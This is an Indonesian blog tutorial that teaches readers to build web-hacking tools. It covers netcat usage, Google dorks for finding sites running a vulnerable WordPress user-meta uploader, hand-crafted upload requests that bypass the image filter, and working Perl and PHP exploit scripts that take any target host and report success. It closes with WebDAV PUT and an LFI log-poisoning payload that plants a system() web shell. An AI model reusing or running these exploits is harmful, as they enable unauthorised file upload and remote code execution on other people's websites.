Kamis, 15 Januari 2015

Cara Membuat Tool Web Hacking

netcat alias Swiss-army knife for TCP/IP adalah sebuah utiliti tool yang digunakan untuk berbagai hal yang berkaitan dengan protokol TCP atau UDP. Yang dapat membuka koneksi TCP, mengirimkan paket¬paket UDP, listen pada port ¬port TCP dan UDP, melakukan scanning port, dan sesuai dengan IPV4 dan IPV6.

Perintah dasar Netchat



Code:
-4              Use IPv4
-6              Use IPv6
-D              Enable the debug socket option
-d              Detach from stdin
-h              This help text
-I length       TCP receive buffer length
-i secs         Delay interval for lines sent, ports scanned
-k              Keep inbound sockets open for multiple connect
-l              Listen mode, for inbound connects
-n              Suppress name/port resolutions
-O length       TCP send buffer length
-P proxyuser    Username for proxy authentication
-p port         Specify local port for remote connects
-r              Randomize remote ports
-s addr         Local source address
-T toskeyword   Set IP Type of Service
-C              Send CRLF as line-ending
-t              Answer TELNET negotiation
-U              Use UNIX domain socket
-u              UDP mode
-V rtable       Specify alternate routing table
-v              Verbose
-w secs         Timeout for connects and final net reads
-X proto        Proxy protocol: "4", "5" (SOCKS) or "connect"
-x addr[:port]  Specify proxy address and port
-z              Zero-I/O mode [used for scanning]
Port numbers can be individual or ranges: lo-hi [inclusive]

TRANSFERT FILE

~client# nc -lp 1234 > file.tar.gz
** l = listen
** p = port
~server# nc -w 1 ip.client.com 1234 < file.tar.gz
** w = timeout

CLONING HARDDISK
~client# ==> nc -l -p 1234 | dd of=/dev/sda
~server# ==> dd if=/dev/sda | nc ip.client.com 1234
**ini belum pernah saya coba


PORT SCANNER
~server# nc -v -w 1 localhost -z 1-1000
~server# nc -v -n -z -w 1 192.168.1.2 1-1000

CHATTING CLIENT - SERVER
~client# ==> nc -lp 1234
~server# ==> nc ip.client.com 1234

SPOOFING HTTP Headers

Method GET

~client# nc server.com 80
GET /index.php?x=exp HTTP/1.1
Host: example.com
Referrer: example.com
User-Agent: my-browser

Method POST

Code:
~client# nc localhost 80
POST /index.php HTTP/1.1
Host: localhost
Referrer: localhost
User-Agent: Firefox
Cookie: PHPSESSID=c1d9f9192c1650ab7b3c71c14268aa44
Content-Type: application/x-www-form-urlencoded
Content-Length: 75
Connection: close

username=admin&password=admin&submit=Login

Penulisan harus benar, spasi setelah titik dua ( : ) dan penggunaan huruf besar setia awal nama reguest dan banyak CRLF/Enter.



** Untuk HTTP Headers jika perintah sukses maka respone header akan tampil "HTTP/1.1 200 OK" seperti ini:
Code:
HTTP/1.1 200 OK
Date: Fri, 07 Sep 2012 09:58:06 GMT
Server: Apache/2.2.21 (Win32) DAV/2 mod_ssl/2.2
perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.8
Content-Length: 1961
Connection: close
Content-Type: text/html


download dan Extrak file tersebut copikan ke

%systemroot%\systen32

atau

C:\Windows\System32

menjalankannya menggunakan dos.



Persiapan
Code:
Pengganti NC bisa juga dengan Temper Data/Live HTTP Header

Pertama kita mencari bug di exploit-db, ambil secara acak. Kemudian mencari salah satu web vulnerable di list search engine google. dengan menggunakan keyword dork tadi. contoh:
- inurl:/wp-content/plugins/user-meta/framework/helper/uploader.php -source -trunk
- intext:user-meta -source -trunk
cari yg mudah aja.

coba membuka webnya dengan method biasa dengan netchat:
Code:
C:\Users\ANASKI>nc www.victim.com 80
GET /wp-content/plugins/user-meta/framework/helper/uploader.php HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:14.0) Gecko/20100101 Firefox/14.0.1
Connection: keep-alive
saya menerima respone dari web tersebut:
Code:
HTTP/1.1 200 OK
Date: Mon, 01 Oct 2012 07:15:49 GMT
Server: Apache/2.2.20 (Unix) mod_ssl/2.2.20 OpenSSL/0.9.8o
X-Powered-By: PHP/5.2.13-pl1-gentoo
Vary: Accept-Encoding,User-Agent
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html

23
{"error":"No files were uploaded."}
0

Ops,, kita udah dapat beberapa informasi mengenai target, ternyata uploadernya tidak membutuhkan authorisasi.
Sekarang kita coba meng-upload file ke target tersebut.

Kita perhatikan HTML reguestnya:
Code:
<form action="" method="post" enctype="multipart/form-data">
<input type="file" name="qq" />
<input type="submit" />
</form>
kemudian kita sesuain dengan nc nya
Code:
C:\Users\ANASKI>nc www.victim.com 80
POST /wp-content/plugins/user-meta/framework/helper/uploader.php HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:14.0) Gecko/20100101 Firefox/14.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: id,en-us;q=0.7,en;q=0.3
Connection: keep-alive
Referer: http://victim.com/user-meta.php
Content-Type: multipart/form-data; boundary=---------------------------41184676334
Content-length: 204

-----------------------------41184676334

Content-Disposition: form-data; name="qqfile"; filename="exp.php.jpeg"
Content-Type: sound/midi

Hacked by Tester
-----------------------------41184676334--
server merespone
HTTP/1.1 400 Bad Request
Date: Mon, 01 Oct 2012 07:46:25 GMT
Server: Apache/2.2.20 (Unix) mod_ssl/2.2.20 OpenSSL/0.9.8o
Content-Length: 475
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>400 Bad Request</title>
</head><body>
<h1>Bad Request</h1>
<p>Your browser sent a request that this server could not understand.<br />
Request header field is missing ':' separator.<br />
<pre>
POST /wp-content/plugins/user-meta/framework/helper/uploader.php HTTP/1.1</pre>
</p>
<hr>
<address>Apache/2.2.20 (Unix) mod_ssl/2.2.20 OpenSSL/0.9.8o Server at victim.com Port 80</address>
</body></html>
berarti ada kesalahan waktu saya menulis reguest melalui nc.
kita periksa lagi.

setelah kita periksa kita ulangi lagi sampe benar penulisannya.
untuk error code saya telah membuat listnya:
Code:
1xx    Informational    100    Continue
        101    Switching Protocols
        102    Processing (WebDAV; RFC 2518)
2xx     Success    200    OK
        201    Created
        202    Accepted
        203    Non-Authoritative Information (since HTTP/1.1)
        204    No Content
        205    Reset Content
        206    Partial Content
        207    Multi-Status (WebDAV; RFC 4918)
        208    Already Reported (WebDAV; RFC 5842)
        226    IM Used (RFC 3229)
3xx     Redirection    300    Multiple Choices
        301    Moved Permanently
        302    Found
        303    See Other (since HTTP/1.1)
        304    Not Modified
        305    Use Proxy (since HTTP/1.1)
        306    Switch Proxy
        307    Temporary Redirect (since HTTP/1.1)
        308    Permanent Redirect (approved as experimental RFC])
4xx    Client Error    400    Bad Request
        401    Unauthorized
        402    Payment Required
        403    Forbidden
        404    Not Found
        405    Method Not Allowed
        406    Not Acceptable
        407    Proxy Authentication Required
        408    Request Timeout
        409    Conflict
        410    Gone
        411    Length Required
        412    Precondition Failed
        413    Request Entity Too Large
        414    Request-URI Too Long
        415    Unsupported Media Type
        416    Requested Range Not Satisfiable
        417    Expectation Failed
        418    I'm a teapot (RFC 2324)
        420    Enhance Your Calm (Twitter)
        422    Unprocessable Entity (WebDAV; RFC 4918)
        423    Locked (WebDAV; RFC 4918)
        424    Failed Dependency (WebDAV; RFC 4918)
        425    Unordered Collection (Internet draft)
        426    Upgrade Required (RFC 2817)
        428    Precondition Required (RFC 6585)
        429    Too Many Requests (RFC 6585)
        431    Request Header Fields Too Large (RFC 6585)
        444    No Response (Nginx)
        449    Retry With (Microsoft)
        450    Blocked by Windows Parental Controls (Microsoft)
        451    Unavailable For Legal Reasons (Internet draft)
        451    Redirect (Microsoft)
        494    Request Header Too Large (Nginx)
        495    Cert Error (Nginx)
        496    No Cert (Nginx)
        497    HTTP to HTTPS (Nginx)
        499    Client Closed Request (Nginx)
5xx    Server Error    500    Internal Server Error
        501    Not Implemented
        502    Bad Gateway
        503    Service Unavailable
        504    Gateway Timeout
        505    HTTP Version Not Supported
        506    Variant Also Negotiates (RFC 2295)
        507    Insufficient Storage (WebDAV; RFC 4918)
        508    Loop Detected (WebDAV; RFC 5842)
        509    Bandwidth Limit Exceeded (Apache bw/limited extension)
        510    Not Extended (RFC 2774)
        511    Network Authentication Required (RFC 6585)
        598    Network read timeout error (Unknown)
        599    Network connect timeout error (Unknown)

Kita test lagi:
Code:
POST /wp-content/plugins/user-meta/framework/helper/uploader.php HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:14.0) Gecko/20100101 Firefox/14.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: id,en-us;q=0.7,en;q=0.3
Connection: keep-alive
Content-Type: multipart/form-data; boundary=---------------------------23281168279961
Content-Length: 208

-----------------------------23281168279961
Content-Disposition: form-data; name="qq"; filename="hacked.php.jpg"
Content-Type: image/jpeg

hacked by tester
-----------------------------23281168279961—



ternyata benar,,, kemudian kita catat reguest tersebut

Nah sekarang kita coba2 bypass filter imagenya, misal dengan menggunakan header GIF/jpeg

Code:
POST /wp-content/plugins/user-meta/framework/helper/uploader.php HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:14.0) Gecko/20100101 Firefox/14.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: id,en-us;q=0.7,en;q=0.3
Connection: keep-alive
Content-Type: multipart/form-data; boundary=---------------------------23281168279961
Content-Length: 214

-----------------------------23281168279961
Content-Disposition: form-data; name="qq"; filename="hacked.php.jpg"
Content-Type: image/jpeg

‰PNGhacked by tester
-----------------------------23281168279961--

atau teknik2 yang lain, klw udah tembus. reguest di catat, nantikan next tutor membuat exploit sendiri.

Membuat Hacking Tool dengan Perl
Sebelumnya kita telah mencoba-coba target/victim dengan netcat, kemudian kita mencatat reguest/raw data exploitnya. langkah itu jg bisa dilakukan dengan addons mozila firefox liveheader/temper, acunetix http editor atw yg lainnya.

misal:
Code:
POST /wordpress/wp-content/plugins/user-meta/framework/helper/uploader.php HTTP/1.1
Host: victim.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:14.0) Gecko/20100101 Firefox/14.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: id,en-us;q=0.7,en;q=0.3
Connection: keep-alive
Content-Type: multipart/form-data; boundary=---------------------------24464570528145
Content-Length: 209

-----------------------------24464570528145
Content-Disposition: form-data; name="qqfile"; filename="x.php3.jpeg"
Content-Type: image/jpeg

Hacked by Tester
-----------------------------24464570528145--
Sekarang kita akan membuatnya kedalam bahasa pemograman perl.
Code:
#!/usr/bin/perl
use IO::Socket::INET;
#membuat koneksi
my $sock = new IO::Socket::INET( PeerAddr => "victim.com", PeerPort => "80", Proto => "tcp",  Timeout => 0, );
    #jika koneksi terjadi
    if ($sock) {
        my $enter = "\r\n"; #enter
        #memulai reguest header
        print $sock 'POST /wordpress/wp-content/plugins/user-meta/framework/helper/uploader.php HTTP/1.1'.$enter;
        print $sock 'Host: victim.com'.$enter;
        print $sock 'User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:14.0) Gecko/20100101 Firefox/14.0.1'.$enter;
        print $sock 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'.$enter;
        print $sock 'Accept-Language: id,en-us;q=0.7,en;q=0.3'.$enter;
        print $sock 'Connection: keep-alive'.$enter;
        print $sock 'Referer: http://victim.com/wordpress/wp-content/plugins/user-meta/framework/helper/uploader.php'.$enter;
        print $sock 'Content-Type: multipart/form-data; boundary=---------------------------24464570528145'.$enter;
        print $sock 'Content-Length: 209'.$enter; #hitung panjang postdata
        print $sock $enter;
        #membuat  postdatanya
        print $sock '-----------------------------24464570528145'.$enter;
        print $sock 'Content-Disposition: form-data; name="qqfile"; filename="x.php3.jpeg"'.$enter;;
        print $sock 'Content-Type: image/jpeg'.$enter;
        print $sock $enter;
        #membuat data
        print $sock 'Hacked by Tester'.$enter;
        print $sock '-----------------------------24464570528145--'.$enter;
        #enter buat mengirim
        print $sock $enter;
    }
 
print <$sock>;
close($sock);
perhatikan baik2 gambar yang udah saya sediakan


dengan sedikit kemampuan perl temen2 udah bisa membuat exploit sendiri.
untuk membuat post-data dan Content-Length tentu lebih sulit, nah disini kita pisah saja postdata nya, kita jadikan sebuah variable
nanti untuk mendapatkan Content-Length kita tinggal menggunakan fungsi length($string).
Code:
#!/usr/bin/perl
use IO::Socket::INET;

#membuat koneksi
my $sock = new IO::Socket::INET( PeerAddr => "victim.com", PeerPort => "80", Proto => "tcp",  Timeout => 0, );
    #jika koneksi terjadi
    if ($sock) {
        my $enter = "\r\n"; #enter
        #membuat post-data
        $postdata  .= '-----------------------------24464570528145'.$enter;
        $postdata .= 'Content-Disposition: form-data; name="qqfile"; filename="x.php3.jpeg"'.$enter;
        $postdata .= 'Content-Type: image/jpeg'.$enter;
        $postdata .= $enter;
        $postdata .= 'Hacked by Tester'.$enter;
        $postdata .= '-----------------------------24464570528145--'.$enter;
        $postdata .= $enter;
     
        #memulai reguest header
        print $sock 'POST /wordpress/wp-content/plugins/user-meta/framework/helper/uploader.php HTTP/1.1'.$enter;
        print $sock 'Host: victim.com'.$enter;
        print $sock 'User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:14.0) Gecko/20100101 Firefox/14.0.1'.$enter;
        print $sock 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'.$enter;
        print $sock 'Accept-Language: id,en-us;q=0.7,en;q=0.3'.$enter;
        print $sock 'Connection: keep-alive'.$enter;
        print $sock 'Referer: http://victim.com/wordpress/wp-content/plugins/user-meta/framework/helper/uploader.php'.$enter;
        print $sock 'Content-Type: multipart/form-data; boundary=---------------------------24464570528145'.$enter;
        print $sock 'Content-Length: '.length($postdata).$enter; #hitung panjang dengan fungsi length
        print $sock $enter;
        print $sock $postdata;
    }
 
print <$sock>;
close($sock);
untuk membuat tool yang user friendly tentu kita musti menambahkan output berhasil atau nggaknya dan kita juga membutuhkan input nama host.

nah misal kita menerima input berhasilnya seperti ini:
Code:
{"success":true,"fieldname":null,"filepath":"\/2012\/10\/1349169219.jpeg"}
misal kita membuat patokan "success":true
Code:
if    ($respone =~ /"success":true/){
    print "Keinjek" ;
}else{
    print "Gagal" ;
}
untuk input host kita bisa memanfaatkan variable $ARGV[0]. jadi nanti untuk menjalankannya kita mengetik
perl namascript.pl victim.com

my $host = $ARGV[0];

kira-kira lengkapnya seperti ini:
Code:
#!/usr/bin/perl
use IO::Socket::INET;

#menerima input host
my $host =  $ARGV[0];

#membuat koneksi
my $sock = new IO::Socket::INET( PeerAddr => $host, PeerPort => "80", Proto => "tcp",  Timeout => 0, );
    #jika koneksi terjadi
    if ($sock) {
        my $enter = "\r\n"; #enter
        #membuat post-data
        my $postdata = '';
        $postdata .= '-----------------------------24464570528145'.$enter;
        $postdata .= 'Content-Disposition: form-data; name="qqfile"; filename="x.php3.jpeg"'.$enter;
        $postdata .= 'Content-Type: image/jpeg'.$enter;
        $postdata .= $enter;
        $postdata .= 'Hacked by Tester'.$enter;
        $postdata .= '-----------------------------24464570528145--'.$enter;
        $postdata .= $enter;
     
        #memulai reguest header
        print $sock 'POST /wordpress/wp-content/plugins/user-meta/framework/helper/uploader.php HTTP/1.1'.$enter;
        print $sock 'Host: '.$host.$enter;
        print $sock 'User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:14.0) Gecko/20100101 Firefox/14.0.1'.$enter;
        print $sock 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'.$enter;
        print $sock 'Accept-Language: id,en-us;q=0.7,en;q=0.3'.$enter;
        print $sock 'Connection: keep-alive'.$enter;
        print $sock 'Referer: http://'.$host.'/wordpress/wp-content/plugins/user-meta/framework/helper/uploader.php'.$enter;
        print $sock 'Content-Type: multipart/form-data; boundary=---------------------------24464570528145'.$enter;
        print $sock 'Content-Length: '.length($postdata).$enter; #hitung panjang dengan fungsi length
        print $sock $enter;
        print $sock $postdata;
    }
    #dari array dijadiin variable string
    while(<$sock>) {
        $respone  .= <$sock> ;
    }
 
close($sock);

#regex respone yg didapat

if    ($respone =~ /"success":true/){
    print "Keinjek" ;
}else{
    print "Gagal" ;
}

setelah paham konsep2 dasarnya, temen2 boleh pake class/modules yg disediakan oleh cpan atau yg lebih simple yg lainnya.
seperti module
Code:
use HTTP::Request;
use HTTP::Request::Common;
use HTTP::Request::Common qw(POST);
dan lain-lain, next tutorial dengan bahasa pemograman php. Insya Allah.

Membuat Hacking Tool dengan PHP
Sebelumnya kita telah mencoba-coba target/victim dengan netcat, kemudian kita mencatat reguest/raw data exploitnya. langkah itu jg bisa dilakukan dengan addons mozila firefox liveheader/temper, acunetix http editor atw yg lainnya.
misal:
Code:
POST /wordpress/wp-content/plugins/user-meta/framework/helper/uploader.php HTTP/1.1
Host: victim.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:14.0) Gecko/20100101 Firefox/14.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: id,en-us;q=0.7,en;q=0.3
Connection: keep-alive
Content-Type: multipart/form-data; boundary=---------------------------24464570528145
Content-Length: 209

-----------------------------24464570528145
Content-Disposition: form-data; name="qqfile"; filename="x.php3.jpeg"
Content-Type: image/jpeg

Hacked by Tester
-----------------------------24464570528145--

Klw kita tulis dalam bahasa pemograman php kira2 seperti ini.
PHP Code:
<?php
$sock 
= @fsockopen("victim.com",80,$err_num,$err_msg,30);
if(
$sock){
    
$enter "\r\n" ;
    
fwrite($sock'POST /wordpress/wp-content/plugins/user-meta/framework/helper/uploader.php HTTP/1.1'.$enter);
    
fwrite($sock'Host: victim.com'.$enter);
    
fwrite($sock'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'.$enter) ;
    
fwrite($sock'Accept-Language: id,en-us;q=0.7,en;q=0.3'.$enter);
    
fwrite($sock'Connection: keep-alive'.$enter);
    
fwrite($sock'Referer: http://victim.com/wordpress/wp-content/plugins/user-meta/framework/helper/uploader.php'.$enter);
    
fwrite($sock'Content-Type: multipart/form-data; boundary=---------------------------24464570528145'.$enter);
    
fwrite($sock'Content-Length: 209'.$enter); #hitung panjang postdata
    
fwrite($sock$enter);
    
#membuat postdata identifikasinya
    
fwrite($sock'-----------------------------24464570528145'.$enter);
    
fwrite($sock'Content-Disposition: form-data; name="qqfile"; filename="x.php3.jpeg"'.$enter);
    
fwrite($sock'Content-Type: image/jpeg'.$enter);
    
fwrite($sock$enter);
    
#membuat data
    
fwrite($sock'Hacked by Tester'.$enter);
    
fwrite($sock'-----------------------------24464570528145--'.$enter);
    
#enter buat mengirim
    
fwrite($sock$enter);
}
#mengambil respon dari victimwhile(!feof($sock)){
   
print_r(fgets($sock));
}
fclose($sock);?>
agar mudah dipahami perhatikan gambar.



klw di perl kita membuat versi cli, sekarang kita membuat versi web base nya nanti jalankan toolnya dengan mozila firefox/browser, utk php cli sama dgn perl,,
sama2 menggunakan variable $argv[0] huruf kecil.

Pertama kita buat htmlnya untuk memberikan input hostnya
PHP Code:
<form action="" method="post" >
<
input type="text" name="host" />
<
input type="submit" />
</
form
Nah,, sekarang kita terima yg dikirim html dengan method $_POST['host']
$host = $_POST['host'] ;

sekarang kita menentukan berhasil menembus victim atau gak nya tool yg kita buat.
misal respon berhasilnya td:
Code:
{"success":true,"fieldname":null,"filepath":"\/2012\/10\/1349169219.jpeg"}
kira2 kita tulis seperti ini:


#menentukan berhasil atw gaknya
PHP Code:
if(preg_match("/\"success\":true/",$respone)){
    echo 
"berhasil" ;
} else{
    echo 
"gagal" ;
untuk memudahkan membuat post-data, kita bisa saja membuatkan berupa variable tambahan, seperti pada perl sebelumnya.
dan membuat value Content-Length otomatis, seperti strlen($postdata).
kira-kira jadinya seperti ini:
PHP Code:
<form action="" method="post" >
<
input type="text" name="host" />
<
input type="submit" />
</
form>
<?
php

$host 
= @$_POST['host'] ;$sock = @fsockopen($host,80,$err_num,$err_msg,30);


if(
$sock){
    
$enter "\r\n" ;
 
    
$postdata '-----------------------------24464570528145
Content-Disposition: form-data; name="qqfile"; filename="x.php3.jpeg"
Content-Type: image/jpeg

Hacked by Tester
-----------------------------24464570528145--'
;

    
fwrite($sock'POST /wordpress/wp-content/plugins/user-meta/framework/helper/uploader.php HTTP/1.1'.$enter);
    
fwrite($sock'Host: '.$host.$enter);
    
fwrite($sock'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'.$enter) ;
    
fwrite($sock'Accept-Language: id,en-us;q=0.7,en;q=0.3'.$enter);
    
fwrite($sock'Connection: keep-alive'.$enter);
    
fwrite($sock'Referer: http://'.$host.'/wordpress/wp-content/plugins/user-meta/framework/helper/uploader.php'.$enter);
    
fwrite($sock'Content-Type: multipart/form-data; boundary=---------------------------24464570528145'.$enter);
    
fwrite($sock'Content-Length: '.strlen($postdata).$enter); #hitung panjang postdata
    
fwrite($sock$enter);
    
#membuat postdata identifikasinya
    
fwrite($sock$postdata.$enter);
    
#enter buat mengirim
    
fwrite($sock$enter);
}

while(!
feof($sock)){
    
$respone .= @fgets($sock); //kita jadikan ke bentuk string }fclose($sock);#menentukan berhasil atw gaknyaif(preg_match("/\"success\":true/",$respone)){
    echo 
"berhasil" ;
} else{
    echo 
"gagal" ;
}
?>

setelah paham konsep dasar ini, temen2 coba-coba juga menggunakan function curl yg lebih simple.
dan coba jg reguest2 lain, seperti lfi, sqlinjection dll.

PUT pada Webdav
Code:
PUT /exp.txt HTTP/1.1
Host: victim.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:14.0) Gecko/20100101 Firefox/14.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: id,en-us;q=0.7,en;q=0.3
Connection: keep-alive
Content-Length: xxx

RAW DATA

OPTIONS pada Webdav
Code:
OPTIONS / HTTP/1.1
Host: victim.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:14.0) Gecko/20100101 Firefox/14.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: id,en-us;q=0.7,en;q=0.3
Connection: keep-alive
LFI
Code:
GET /index.php?page=../../logs/pc.pasbar.com HTTP/1.1
Host: victim.com
XC-RCE: ls -laF
User-Agent: <?php @system(\$_SERVER['HTTP_XC_RCE'])?>

0 komentar:

Poskan Komentar